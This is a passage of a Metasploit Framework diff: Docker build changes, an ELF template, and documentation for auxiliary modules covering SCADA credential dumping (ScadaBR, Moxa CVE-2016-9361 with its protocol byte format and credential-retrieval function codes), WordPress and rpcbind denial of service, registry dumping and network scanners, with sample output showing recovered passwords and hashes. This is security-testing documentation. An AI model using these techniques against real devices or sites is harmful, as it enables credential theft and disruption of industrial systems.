dd 0xDEADBEEF ; p_filesz
dd 0xDEADBEEF ; p_memsz
dd 7 ; p_flags = rwx
dd 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dd dynsection ; p_offset
dd dynsection ; p_vaddr
dd dynsection ; p_vaddr
dd dynsz ; p_filesz
dd dynsz ; p_memsz
dd 0x1000 ; p_align
shdr:
dd 1 ; sh_name
dd 6 ; sh_type = SHT_DYNAMIC
dd 0 ; sh_flags
dd dynsection ; sh_addr
dd dynsection ; sh_offset
dd dynsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dd 8 ; sh_addralign
dd 7 ; sh_entsize
shentsize equ $ - shdr
dd 0 ; sh_name
dd 3 ; sh_type = SHT_STRTAB
dd 0 ; sh_flags
dd strtab ; sh_addr
dd strtab ; sh_offset
dd strtabsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dd 0 ; sh_addralign
dd 0 ; sh_entsize
dynsection:
; DT_INIT
dd 0x0c
dd _start
; DT_STRTAB
dd 0x05
dd strtab
; DT_SYMTAB
dd 0x06
dd strtab
; DT_STRSZ
dd 0x0a
dd 0
; DT_SYMENT
dd 0x0b
dd 0
; DT_NULL
dd 0x00
dd 0
dynsz equ $ - dynsection
strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:

BIN
data/templates/template_armle_linux_dll.bin Normal file
View File

Binary file not shown.

BIN
data/templates/template_x86_linux_dll.bin Normal file
View File

Binary file not shown.

7
docker-compose.yml
View File

@ -1,6 +1,6 @@
version: '2'
services:
ms: &ms
ms:
image: metasploit
build:
context: .
@ -12,10 +12,11 @@ services:
ports:
- 4444:4444
volumes:
- $HOME/.msf4:/root/.msf4
- $HOME/.msf4:/home/msf/.msf4
- /etc/localtime:/etc/localtime:ro
db:
image: postgres:9.6
image: postgres:9-alpine
volumes:
- pg_data:/var/lib/postgresql/data

79
docker/Dockerfile
View File

@ -1,47 +1,56 @@
FROM ruby:2.3-alpine
FROM ruby:2.4.1-alpine
MAINTAINER Rapid7
ARG BUNDLER_ARGS="--system --jobs=8"
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
ENV APP_HOME /usr/src/metasploit-framework/
ENV MSF_USER msf
ENV NMAP_PRIVILEGED=""
WORKDIR $APP_HOME
COPY Gemfile* m* Rakefile $APP_HOME
COPY lib $APP_HOME/lib
RUN apk update && \
apk add \
ruby-bigdecimal \
ruby-bundler \
ruby-io-console \
autoconf \
bison \
subversion \
git \
sqlite \
nmap \
libxslt \
postgresql \
ncurses \
&& apk add --virtual .ruby-builddeps \
build-base \
ruby-dev \
libffi-dev\
openssl-dev \
readline-dev \
sqlite-dev \
postgresql-dev \
libpcap-dev \
libxml2-dev \
libxslt-dev \
yaml-dev \
zlib-dev \
ncurses-dev \
bison \
autoconf \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& bundle install $BUNDLER_ARGS \
&& apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/*
apk add \
sqlite-libs \
nmap \
nmap-scripts \
nmap-nselibs \
postgresql-libs \
ncurses \
libcap \
&& apk add --virtual .ruby-builddeps \
autoconf \
bison \
build-base \
ruby-dev \
libffi-dev\
openssl-dev \
readline-dev \
sqlite-dev \
postgresql-dev \
libpcap-dev \
libxml2-dev \
libxslt-dev \
yaml-dev \
zlib-dev \
ncurses-dev \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/*
# fix for robots gem not readable (known bug)
# https://github.com/rapid7/metasploit-framework/issues/6068
RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
RUN adduser -g msfconsole -D $MSF_USER
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip /usr/bin/nmap
USER $MSF_USER
ADD ./ $APP_HOME
CMD ["./msfconsole", "-r", "docker/msfconsole.rc"]

6
docker/docker-compose.development.override.yml
View File

@ -1,7 +1,11 @@
version: '2'
services:
ms: &ms
ms:
build:
args:
BUNDLER_ARGS: --jobs=8
image: metasploit:dev
environment:
DATABASE_URL: postgres://postgres@db:5432/msf_dev

9
docker/msfconsole.rc
View File

@ -1,5 +1,10 @@
<ruby>
run_single("setg LHOST #{ENV['LHOST']}") if ENV['LHOST']
run_single("setg LPORT #{ENV['LPORT']}") if ENV['LPORT']
run_single("db_connect #{ENV['DATABASE_URL'].gsub('postrgres://', '')}") if ENV['DATABASE_URL']
if ENV['LHOST']
lhost = ENV['LHOST']
else
lhost = %x(hostname -i)
end
run_single("setg LHOST #{lhost}")
run_single("db_connect #{ENV['DATABASE_URL']}") if ENV['DATABASE_URL']
</ruby>

4
documentation/modules/auxiliary/admin/chromecast/chromecast_youtube.md
View File

@ -14,9 +14,9 @@ Naturally, audio should be cranked to 11 before running this module.
The YouTube video to be played. Defaults to [kxopViU98Xo](https://www.youtube.com/watch?v=kxopViU98Xo)
## Sample Output
## Scenarios
Of note, this was played on a 1st generation Google Chromecast (USB stick looking, not circular)
### 1st generation Google Chromecast (USB stick looking, not circular)
```
msf > auxiliary/admin/chromecast/chromecast_youtube

63
documentation/modules/auxiliary/admin/http/scadabr_credential_dump.md Normal file
View File

@ -0,0 +1,63 @@
## Description
This module retrieves credentials from ScadaBR, including service credentials and unsalted SHA1 password hashes for all users, by invoking the `EmportDwr.createExportData` DWR method of Mango M2M which is exposed to all authenticated users regardless of privilege level.
## Vulnerable Application
ScadaBR is a SCADA (Supervisory Control and Data Acquisition) system with applications in Process Control and Automation, being developed and distributed using the open source model.
This module has been tested successfully with ScadaBR versions 1.0 CE and 0.9 on Windows and Ubuntu systems.
Installers:
* [Windows Installers](https://sourceforge.net/projects/scadabr/files/Software/Installer%20Win32/)
* [Linux Installers](https://sourceforge.net/projects/scadabr/files/Software/Linux/)
* [Tomcat WAR files](https://sourceforge.net/projects/scadabr/files/Software/WAR/)
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/admin/http/scadabr_credential_dump`
3. Do: `set rhost [IP]`
4. Do: `set username [USERNAME]`
5. Do: `set password [PASSWORD]`
6. Do: `run`
7. You should get credentials
## Scenarios
```
[+] 172.16.191.166:8080 Authenticated successfully as 'admin'
[+] 172.16.191.166:8080 Export successful (4436 bytes)
[+] Found 5 users
[*] Found weak credentials (admin:admin)
[*] Found weak credentials (user:password)
[*] Found weak credentials (zxcv:zxcv)
ScadaBR User Credentials
========================
Username Password Hash (SHA1) Admin E-mail
-------- -------- ----------- ----- ------
admin admin d033e22ae348aeb5660fc2140aec35850c4da997 true admin@yourMangoDomain.com
operator ef0cade28a5696433326749bb57c39104ca33550 false operator@localhost
test 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8 false test@localhost
user password 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 true user@localhost
zxcv zxcv 9878e362285eb314cfdbaa8ee8c300c285856810 false zxcv@localhost
ScadaBR Service Credentials
===========================
Service Host Port Username Password
------- ---- ---- -------- --------
HTTP proxy 127.0.0.1 8080 proxytestuser proxytestpass
SMTP 127.0.0.1 25 smtptestuser smtptestpass
[+] Config saved in: /root/.msf4/loot/20170527210941_default_172.16.191.166_scadabr.config_861842.txt
[*] Auxiliary module execution completed
```

0
documentation/modules/auxiliary/admin/http/zabbix_ldap_password_extractor.md Normal file
View File

177
documentation/modules/auxiliary/admin/scada/moxa_credentials_recovery.md Normal file
View File

@ -0,0 +1,177 @@
## Vulnerable Application
Many Moxa devices make use of a protocol that is vulnerable to unauthenticated credential retrieval via exploitation of CVE-2016-9361. The service is known
to be used on Moxa devices in the NPort, OnCell, and MGate product lines.
This module leverages CVE-2016-9361 to retrieve admin passwords and SNMP
community strings, as well as enumerate all possible function codes. The supporting research and Metasploit module are the work of Patrick DeSantis
of Cisco Talos and K. Reid Wightman.
The module has been tested on Moxa NPort 6250 firmware v1.13, MGate MB3170
firmware v2.5, and NPort 5110 firmware v2.6.
### The Moxa Protocol
The Moxa protocol listens on 4800/UDP and will respond to broadcast or direct traffic. The protocol is utilized by devices in several product lines and
Moxa applications in order to manage and configure network-deployed devices.
#### Discovery / Identify
A discovery packet compels a Moxa device to respond to the sender with some
basic device information that is needed for more advanced functions. The
discovery data is 8 bytes in length and is the most basic example of the Moxa protocol. It may be sent out as a broadcast (destination 255.255.255.255) or
to an individual device.
The discovery request contains the bytes:
```
\x01\x00\x00\x08\x00\x00\x00\x00
```
Where the function code (first byte) 0x01 is Moxa discovery/identify
and the fourth byte is the length of the full data payload.
##### Discovery Response
A valid response is 24 bytes, starts with 0x81, and contains the values
0x00, 0x90, 0xe8 (the Moxa OIU) in bytes 14, 15, and 16.
A response with a value of 0x04 for the second byte indicates that an invalid
function code was used in the corresponding request.
The response can be broken down as follows:
* Byte 0x0 identifies the packet as a response to the request. The first byte of a response will always be the FC + 0x80 (the most significant bit of the byte is set to 1, so 0b00000001 becomes 0b10000001, or 0x81 as response to identify 0x01).
* Bytes 0x1-0x2 are unknown, may be padding
* Byte 0x3 is the length of the datagram payload
* Bytes 0x4-0x7 are unknown, may be padding
* Bytes 0x8-0x9 may be the product line in little endian. For example, an NPort 6250 is part of the 6000 line, so bytes 8 and 9 will be 0x00 and 0x60 respectively.
* Bytes 0xA-0xB are unknown but always seem to be 0x00 and 0x80 respectively.
* Bytes 0xC-0xD are the model number in little endian, so the NPort 6250 is 0x50 and 0x62 respectively.
* Bytes 0xE-0x13 are the MAC address of the device
* Bytes 0x14-0x17 are the IP address
Here's a sample response from an NPort 6250 with the default IP address of 192.168.127.254 and a MAC of 00:90:e8:15:1c:22:
```
0000 81 00 00 18 00 00 00 00 00 60 00 80 50 62 00 90
0010 e8 15 1c 22 c0 a8 7f fe
Model: 0x50 0x60 = 6250
MAC: 00:90:e8:15:1c:22
IP: c0:a8:7f:fe = 192.168.127.254
```
#### Other Functions
The values from the response are then used to craft a new request with the below format:
* Byte 0x0 is the function code
* Bytes 0x1-0x2 are unknown, may be padding
* Byte 0x3 is the length of the datagram payload
* Bytes 0x4-0x7 are unknown, may be padding
* Bytes 0x8-0x9 are the product line in little endian
* Bytes 0xA-0xB are the unknown 0x00 0x80
* Bytes 0xC-0xD is the model number in big endian
* Bytes 0xE-0x13 is the MAC
The module takes a valid response from discovery/ident and parses out the appropriate bytes to use as a "tail" which is appended to all subsequent requests.
```
tail = response[8..24]
```
The tail is then used as shown below:
```
datagram = fc[func] + "\x00\x00\x14\x00\x00\x00\x00" + tail
```
For all function codes other than identify (0x01), as long as the "tail" values in the request match those of the target, the device will execute the function defined by the value in byte 0x0.
##### Other Known and Suspected Function Codes
Function codes fall in the range of 0x01 to 0x7F.
The below function codes are included in the module, even if unused. The intent is that the user may modify the module as needed to make use of other function codes.
```
'ident' => "\x01", # identify device
'name' => "\x10", # get the "server name" of the device
'netstat' => "\x14", # network activity of the device
'unlock1' => "\x16", # "unlock" some devices, including 5110, MGate
'date_time' => "\x1a", # get the device date and time
'time_server' => "\x1b", # get the time server of device
'unlock2' => "\x1e", # "unlock" 6xxx series devices
'snmp_read' => "\x28", # snmp community strings
'pass' => "\x29", # admin password of some devices
'all_creds' => "\x2c", # snmp comm strings and admin password of 6xxx
```
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/admin/scada/moxa_credentials_recovery```
3. Do: ```set RHOST <target IP>```
4. Do: ```run```
5. Any found credentials will be stored in loot (set VERBOSE to TRUE to have credentials output to console)
## Options
**RHOST**
Target device.
**FUNCTION**
Either CREDS (default) or ENUM:
* CREDS attempts to retrieve administrative password and SNMP community strings
* ENUM will enumerate all function codes in the range 0x2..0x7F
## Scenarios
### Check
The module implements a check function to determine if a target "speaks" the Moxa protocol. It does this using the 0x01 function code and checking for a valid response of 24 bytes, starting with 0x81, and containing the values 0x00, 0x90, 0xe8 (the Moxa OIU) in bytes 14, 15, and 16.
```
if response[0] == "\x81" && response[14..16] == "\x00\x90\xe8" && response.length == 24
```
### Output Hexdump to Console
To output hexdump responses to console:
```
msf > use auxiliary/admin/scada/moxa_credentials_recovery
msf auxiliary(moxa_credentials_recovery) > set RHOST <target IP>
msf auxiliary(moxa_credentials_recovery) > set VERBOSE TRUE
msf auxiliary(moxa_credentials_recovery) > run
```
Sample verbose output:
```
... SNIP...
[*] Response:
90 00 00 3c 00 00 00 00 00 60 00 80 50 62 00 90 |...<.....`..Pb..|
e8 15 1c 22 4e 50 36 32 35 30 5f 35 38 39 36 00 |..."NP6250_5896.|
10 00 11 00 12 00 13 00 14 00 15 00 16 00 17 00 |................|
18 00 19 00 1a 00 1b 00 1c 00 1d 00 |............|
... SNIP ...
[*] snmp community retrieved: public_admin
[*] snmp read/write community retrieved: private_admin
[*] password retrieved: secretpassword
... SNIP ...
```
### Enumerate All Function Codes
To enumerate ALL function codes :
```
msf > use auxiliary/admin/scada/moxa_credentials_recovery
msf auxiliary(moxa_credentials_recovery) > set RHOST <target IP>
msf auxiliary(moxa_credentials_recovery) > set FUNCTION ENUM
msf auxiliary(moxa_credentials_recovery) > run
```
Sample ENUM output:
```
... SNIP...
[*] Function Code: 14 |.|
[*] Response:
94 00 01 08 00 00 00 00 00 60 00 80 50 62 00 90 |.........`..Pb..|
e8 15 1c 22 0f 00 00 00 00 00 00 00 00 00 00 00 |..."............|
00 00 00 00 00 00 00 00 00 00 00 00 c0 a8 7f fe |................|
00 00 c0 12 00 00 ff 00 00 00 00 00 00 00 00 00 |................|
00 00 a1 00 00 00 00 00 00 00 00 00 c0 a8 7f fe |................|
00 00 89 00 00 00 00 00 00 00 00 00 c0 a8 7f fe |................|
00 00 24 13 01 01 ff 00 00 00 00 00 00 00 00 00 |..$.............|
00 00 b5 03 00 00 00 00 00 00 00 00 c0 a8 7f fe |................|
00 00 34 3a 01 01 00 00 00 00 00 00 c0 a8 7f fe |..4:............|
00 00 17 00 01 01 00 00 00 00 00 00 c0 a8 7f fe |................|
... SNIP ...
```
Note that the above response is an example of the utility of using ENUM. This function code (0x14) returns a netstat-type response. Output similar to the above will be displayed for every function code that does not return 'invalid' (0x4). This may also be useful for devices that do not "unlock" using the function codes supplied in this module; by running through all function codes in sequence, it is likely that an alternate "unlock" function will be sent prior to any function codes that request credentials.
NOTE: As the protocol is undocumented and the purpose of a majority of the function codes are unknown, undesired results are possible. Do NOT use on devices which are mission-critical!

41
documentation/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.md Normal file
View File

@ -0,0 +1,41 @@
## Vulnerable Application
This module exploits a Cross-site request forgery (CSRF) vulnerability in the [wp_ajax_update_plugin](https://core.trac.wordpress.org/changeset/38168)
function in wp-admin/includes/ajax-actions.php in Wordpress before 4.6. This allows remote authenticated users to cause a denial of
service (with /dev/random read operations).
You can find the vulnerable application like [4.5.3](https://wordpress.org/wordpress-4.5.3.tar.gz) from the
[official website](https://wordpress.org/download/release-archive/)
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/dos/http/wordpress_directory_traversal_dos.rb```
3. Do: ```set RHOST [IP]```
4. Do: ```set TARGETURI [WordPress path]```
5. Do: ```set USERNAME [Valid Username]```
6. Do: ```set PASSWORD [Valid Password]```
7. Do: ```exploit```
8. WordPress website should be down
## Scenarios
### Wordpress 4.5.3 on Linux Mint 17.3
```
msf auxiliary(wordpress_directory_traversal_dos) > exploit
[*] Checking if user "test" exists...
[+] Username "test" is valid
[*] Executing requests 1 - 5...
[+] Finished executing requests 1 - 5
[*] Executing requests 6 - 10...
[+] Finished executing requests 6 - 10
...
[*] Executing requests 191 - 195...
[+] Finished executing requests 191 - 195
[*] Executing requests 196 - 200...
[+] Finished executing requests 196 - 200
[+] SUCCESS: /wordpress appears to be down
[*] Auxiliary module execution completed
```

29
documentation/modules/auxiliary/dos/rpc/rpcbomb.md Normal file
View File

@ -0,0 +1,29 @@
## Vulnerable Application
This module [exploits a vulnerability](http://openwall.com/lists/oss-security/2017/05/03/12) in rpcbind through 0.2.4,
LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3.
Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target.
## Verification Steps
1. Start msfconsole
1. Do: `use auxiliary/dos/rpc/rpcbomb`
1. Do: `set RHOSTS [IP]`
1. Do: `run`
1. Target should leak memory
## Scenarios
### rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64)
```
msf > use auxiliary/dos/rpc/rpcbomb
msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7
RHOSTS => 10.0.2.7
msf auxiliary(rpcbomb) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(rpcbomb) >
```

4
documentation/modules/auxiliary/gather/censys_search.md
View File

@ -9,9 +9,9 @@ The module use the Censys REST API to access the same data accessible through we
5: Do: `set CENSYS_DORK rapid7`
6: Do: `run`
## Sample Output
## Scenarios
#### Certificates Search
### Certificates Search
```
msf auxiliary(censys_search) > set CENSYS_DORK rapid7

105
documentation/modules/auxiliary/gather/snare_registry.md Normal file
View File

@ -0,0 +1,105 @@
## Description
This module uses the Registry Dump feature of the [Snare Lite for Windows](https://sourceforge.net/projects/snare/) HTTP service on 6161/TCP to retrieve the Windows registry. The Registry Dump functionality is unavailable in Snare Enterprise.
**Note: The Registry Dump functionality accepts only one connected client at a time. Requesting a large key/hive will cause the service to become unresponsive until the server completes the request.**
## Vulnerable Application
SNARE (System iNtrusion Analysis and Reporting Environment) is a series of log collection agents that facilitate centralised analysis of audit log data.
This module has been tested successfully with Snare Lite for Windows version 4.0.2.0 on Windows XP SP3.
Snare Lite for Windows is no longer supported, however a [free trial is available](http://www.snarealliance.com/snare-open-source-agent-downloads-submission/) from the Snare Alliance website.
## Verification Steps
1. Start `msfconsole`
2. Do: `use auxiliary/gather/snare_registry`
3. Do: `set rhost [IP]`
4. Do: `set HttpUsername [USERNAME]`
5. Do: `set HttpPassword [PASSWORD]`
6. Do: `run`
7. You should get a copy of *HKLM\HARDWARE\DESCRIPTION\System* from the remote Windows system
## Options
**HttpUsername**
The username for Snare remote access (default: `snare`).
**HttpPassword**
The password for Snare remote access (default: blank).
**REG_DUMP_KEY**
Retrieve the specified registry key and all sub-keys.
**REG_DUMP_ALL**
Retrieve the entire Windows registry.
**TIMEOUT**
Timeout in seconds for downloading each registry key/hive.
## Scenarios
Retrieve a specific registry key:
```
msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM\\HARDWARE\\DESCRIPTION\\System
REG_DUMP_KEY => HKLM\HARDWARE\DESCRIPTION\System
msf auxiliary(snare_registry) > run
[*] 192.168.18.155:6161 - Retrieving registry key 'HKLM\\HARDWARE\\DESCRIPTION\\System'...
[+] 192.168.18.155:6161 - Retrieved key successfully (23092 bytes)
[+] File saved in: /root/.msf4/loot/20151225133011_default_192.168.18.155_snare.registry_842138.txt
[*] Auxiliary module execution completed
```
Retrieve an entire hive:
```
msf auxiliary(snare_registry) > set REG_DUMP_KEY HKLM
REG_DUMP_KEY => HKLM
msf auxiliary(snare_registry) > run
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKLM'...
[+] 192.168.18.155:6161 - Retrieved key successfully (10657975 bytes)
[+] File saved in: /root/.msf4/loot/20151225133147_default_192.168.18.155_snare.registry_247207.txt
[*] Auxiliary module execution completed
```
Retrieve the entire registry:
```
msf auxiliary(snare_registry) > set REG_DUMP_ALL true
REG_DUMP_ALL => true
msf auxiliary(snare_registry) > run
[*] 192.168.18.155:6161 - Retrieving list of registry hives ...
[+] 192.168.18.155:6161 - Found 5 registry hives (HKEY_CLASSES_ROOT, HKEY_CURRENT_CONFIG, HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE, HKEY_USERS)
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CLASSES_ROOT'...
[+] 192.168.18.155:6161 - Retrieved key successfully (3933816 bytes)
[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_070659.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_CONFIG'...
[+] 192.168.18.155:6161 - Retrieved key successfully (5605 bytes)
[+] File saved in: /root/.msf4/loot/20151225133222_default_192.168.18.155_snare.registry_376606.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_CURRENT_USER'...
[+] 192.168.18.155:6161 - Retrieved key successfully (269927 bytes)
[+] File saved in: /root/.msf4/loot/20151225133223_default_192.168.18.155_snare.registry_653681.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_LOCAL_MACHINE'...
[+] 192.168.18.155:6161 - Retrieved key successfully (11446508 bytes)
[+] File saved in: /root/.msf4/loot/20151225133336_default_192.168.18.155_snare.registry_003003.txt
[*] 192.168.18.155:6161 - Retrieving registry hive 'HKEY_USERS'...
[+] 192.168.18.155:6161 - Retrieved key successfully (1668306 bytes)
[+] File saved in: /root/.msf4/loot/20151225133342_default_192.168.18.155_snare.registry_236335.txt
[*] Auxiliary module execution completed
```

27
documentation/modules/auxiliary/scanner/backdoor/energizer_duo_detect.md Normal file
View File

@ -0,0 +1,27 @@
## Vulnerable Application
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: `use auxiliary/scanner/backdoor/energizer_duo_detect`
4. Do: `set rhosts`
5. Do: `run`
## Scenarios
A run against the backdoor
```
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
```

50
documentation/modules/auxiliary/scanner/chargen/chargen_probe.md Normal file
View File

@ -0,0 +1,50 @@
## Vulnerable Application
Chargen is a debugging and measurement tool and a character generator service. Often `chargen` is included in `xinetd`,
along with `echo`, `time`, `daytime`, and `discard`.
While its possible to run chargen on TCP, the most common implementation is UDP.
The following was done on Kali linux:
1. `apt-get install xinetd`
2. edit `/etc/xinetd.d/chargen` and changed `disabled = yes` to `disabled = no`. The first one is for `TCP` and the second is for `UDP`.
3. Restart the service: `service xinetd restart`
## Verification Steps
1. Install and configure chargen
2. Start msfconsole
3. Do: `use auxiliary/scanner/chargen/chargen_probe`
4. Do: `run`
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/chargen/chargen_probe
msf auxiliary(chargen_probe) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(chargen_probe) > set verbose true
verbose => true
msf auxiliary(chargen_probe) > run
[*] 127.0.0.1:19 - Response: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefgh
"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghij
$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijk
%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijkl
&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklm
'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmn
()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmno
)*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnop
*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopq
+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqr
,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrs
-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrst
./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghi
[+] 127.0.0.1:19 answers with 1022 bytes (headers + UDP payload)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

64
documentation/modules/auxiliary/scanner/discovery/arp_sweep.md Normal file
View File

@ -0,0 +1,64 @@
## Vulnerable Application
ARP (the Address Resolution Protocol) is a companion protocol to IPv4.
Its purpose is to resolve internet layer addresses (as IPv4) of stations
on the local network to their corresponding link layer addresses
(for example, Ethernet).
(As a side note, in IPv6 this task is assolved by the Neighbour Discovery
protocol.)
The discovery is limited to the broadcast domain of the local network;
so you cannot discover hosts that aren't directly connected to your LAN.
## Target Devices
All the devices on a network should reply to ARP requests for communication
and duplicate address detection, so usually every device should be
discoverable.
## Verification Steps
Here we suppose the local network is 192.168.0.0/24:
1. Start msfconsole
2. Do `use auxiliary/scanner/discovery/arp_sweep`
3. Set the RHOSTS according to your local network. For example, on a
192.168.0.0/24 network:
`set rhosts 192.168.0.0/24`
4. Do `run`
## Scenarios
An example output on a home network:
```
msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf auxiliary(arp_sweep) > run
[*] 192.168.0.1 appears to be up (D-Link International).
[*] 192.168.0.2 appears to be up (UNKNOWN).
[*] 192.168.0.4 appears to be up (ASUSTek COMPUTER INC.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Confirming using NMAP
The `-PR` flags are utilized to perform ARP/Neighbor Discovery scans.
```
nmap -n -sn -PR 192.168.0.0/24
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-19 00:33 CEST
Nmap scan report for 192.168.0.1
Host is up (0.041s latency).
MAC Address: CC:B2:55:14:CO:FE (D-Link International)
Nmap scan report for 192.168.0.4
Host is up (0.076s latency).
MAC Address: C8:85:50:4C:BE:EF (ASUSTek COMPUTER INC.)
Host is up (0.052s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.76 seconds
```

58
documentation/modules/auxiliary/scanner/finger/finger_users.md Normal file
View File

@ -0,0 +1,58 @@
## Vulnerable Application
Finger is an older protocol which displays information about users on a machine. This can be abused to verify if a user is valid on that machine.
The protocol itself was designed in the 1970s, and is run in cleartext.
The following was done on Kali linux:
1. `apt-get install inetutils-inetd fingerd`
2. Start the service: `/etc/init.d/inetutils-inetd start`
## Verification Steps
1. Install fingerd
2. Start msfconsole
3. Do: `use auxiliary/scanner/finger/finger_users`
4. Do: `set rhosts`
5. Do: `run`
## Options
**USERS_FILE**
The USERS_FILE is a newline delimited list of users and defaults to `unix_users.txt` included with metasploit.
## Scenarios
A run against the configuration from these docs
```
msf > use auxiliary/scanner/finger/finger_users
msf auxiliary(finger_users) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf auxiliary(finger_users) > run
[+] 127.0.0.1:79 - 127.0.0.1:79 - Found user: root
[+] 127.0.0.1:79 - 127.0.0.1:79 Users found: root
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
## Confirming using NMAP
Utilizing the [finger](https://nmap.org/nsedoc/scripts/finger.html) script
```
# nmap -p 79 --script finger 127.0.0.1
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-26 19:35 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000039s latency).
PORT STATE SERVICE
79/tcp open finger
| finger: Login Name Tty Idle Login Time Office Office Phone\x0D
| root root tty2 16d Apr 10 19:17 (:0)\x0D
|_root root *pts/3 1d Apr 25 19:11 (192.168.2.175)\x0D
Nmap done: 1 IP address (1 host up) scanned in 0.42 seconds
```

93
documentation/modules/auxiliary/scanner/ftp/anonymous.md Normal file
View File

@ -0,0 +1,93 @@
## Description
This module allows us to scan through a series of IP Addresses and provide details whether anonymous access is allowed or not in that particular FTP server. By default, anonymous access is not allowed by the FTP server.
## Vulnerable Application
### Install ftp server on Kali Linux:
1. ```apt-get install vsftpd```
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
```
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
```
3. **IMPORTANT:** For allowing anonymous access set ```anonymous_enable=YES```
4. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
5. ```service vsftpd start```
### Installing FTP for IIS 7.5 in Windows:
#### IIS 7.5 for Windows Server 2008 R2:
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
6. Click Next.
7. On the Confirm Installation Selections page, click Install.
8. On the Results page, click Close.
#### IIS 7.5 for Windows 7:
